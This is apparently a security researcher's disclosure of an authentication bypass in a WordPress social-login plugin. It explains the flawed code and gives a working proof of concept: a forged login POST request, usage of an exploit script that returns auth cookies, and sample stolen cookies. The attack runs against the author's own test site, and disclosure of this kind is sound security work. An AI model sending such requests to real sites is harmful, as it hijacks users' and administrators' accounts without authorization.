The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s email address. Depending on whose email address we know, we may even be given an administrator role on the website.

 

Let’s check the plugin

The bp_social_connect_facebook class adds the following action hook:

add_action( 'wp_ajax_nopriv_bp_social_connect_facebook_login', array( $this, 'bp_social_connect_facebook_login' ) );

The bp_social_connect_facebook_login() method includes the following request handling:

extract( $_POST );

This code in PHP extracts the values submitted through the POST method and assigns them to variables.

The function then tries to find the user based on the user ID received from Facebook, and if there is such a user, it logs the user in. It then tries to find the user based on the email received from Facebook. If there is such a user, it logs the user in:

if ( email_exists( $email ) ) {
	$user = $this->force_login( $email, false );

The function doesn’t have any verification that the data is from Facebook. This means that we can enter any arbitrary value in the request, it is not verified by the function.
This means that if we specify the user’s email in the request, it will immediately log us in as the user without verification.

 

Let’s see how we can exploit this vulnerability

We only need to send a POST request to exploit this vulnerability.

The HTTP request to the https://lana.solutions/vdb/vibethemes-bp-social-connect/ which is a test WordPress website:

POST /vdb/vibethemes-bp-social-connect/ HTTP/1.1
Host: lana.solutions
Content-Type: application/x-www-form-urlencoded

action=bp_social_connect_facebook_login&security=f18e5cb1fa&email=vdb%40lana.codes&id=undefined

Note: We find the security value (the nonce), in the head as input hidden html.

 

The exploit script

I created a Python script that returns the WordPress logged_in and auth cookie:

Source: vibethemes_bp_social_connect_plugin_vdb_get_exploit_cookie.py

How to use:

python3 vibethemes_bp_social_connect_plugin_vdb_get_exploit_cookie.py --website_url="https://lana.solutions/vdb/vibethemes-bp-social-connect/" --email="[email protected]"

We get something like this:

Response Cookies:

Name: wordpress_logged_in_9b4a50e46ed1050b69b1a8deb83c1965
Value: test%7C1685390027%7CUOOaA1cHvJdNFpHUjE6sBjfEh61w4nuRxOOETVEtwfQ%7C9e01a5ee073e124d9d6f17a23b840808a1edc00b871d9725c26362a7ef0446cb
Domain: lana.solutions
Path: /vdb/vibethemes-bp-social-connect/
Expires: None
Secure: True
HttpOnly: False

Name: wordpress_sec_9b4a50e46ed1050b69b1a8deb83c1965
Value: test%7C1685390027%7CUOOaA1cHvJdNFpHUjE6sBjfEh61w4nuRxOOETVEtwfQ%7C1424381517663a10919166571494d662f748573406acf325695a5e5f138275b8
Domain: lana.solutions
Path: /vdb/vibethemes-bp-social-connect/wp-admin
Expires: None
Secure: True
HttpOnly: False

Then all we have to do is set the cookie using the browser’s Developer Tools on the website, which in our case is https://lana.solutions/vdb/vibethemes-bp-social-connect/

 

Try it

Feel free to try and use the lana.solutions/vdb WordPress websites for testing. I have set the roles and capabilities, so you can only get low level access to the website.

Website: https://lana.solutions/vdb/vibethemes-bp-social-connect/